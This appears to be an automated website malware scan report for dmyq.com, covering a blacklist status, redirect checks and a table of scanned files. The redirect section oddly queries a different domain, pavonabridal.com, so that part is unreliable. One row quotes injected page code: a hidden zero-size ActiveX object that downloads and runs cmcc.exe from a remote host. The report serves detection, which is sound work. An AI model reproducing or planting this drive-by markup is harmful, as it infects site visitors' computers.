Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dmyq.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pavonabridal.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 27 Jan 2015 00:30:32 GMT
Location: http://ww15.pavonabridal.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3-7+squeeze23
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pavonabridal.com
Referer: http://www.google.com/search?q=pavonabridal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://dmyq.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 03 Oct 2014 03:54:34 GMT Location: http://www.yqmama.cn Server: Apache/2.2.6 (Win32) PHP/5.2.5 Content-Length: 891 Content-Type: text/html X-Powered-By: PHP/5.2.5 | malicious |
http://www.yqmama.cn/ | 200 OK Content-Length: 104557 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 1.qhacklm.sinaapp.com ...[3479 bytes skipped]... discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1" type="text/javascript" charset="UTF-8"></script></body> </html><div style="position: absolute; top: -999px;left: -999px;"> <h3><div id="link25541lianjie8"> </html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://1.qhacklm.sinaapp.com/DownloaderActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://1.qhacklm.sinaapp.com/cmcc.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM ...[238 bytes skipped]... | ||
http://www.yqmama.cn/static/js/common.js?r2s | 200 OK Content-Length: 63268 Content-Type: application/javascript | clean |
http://dmyq.com/static/js/portal.js?r2s | 200 OK Content-Length: 11314 Content-Type: application/javascript | clean |
http://dmyq.com/template/comiis_19lou/img/comiis.js | 200 OK Content-Length: 84763 Content-Type: application/javascript | clean |
http://dmyq.com/template/comiis_19lou/img/comiis_jq.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
http://dmyq.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://tcss.qq.com/ping.js?v=1r2s | 200 OK Content-Length: 8909 Content-Type: application/x-javascript | clean |
http://dmyq.com/home.php?mod=misc&ac=sendmail&rand=1412308475 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |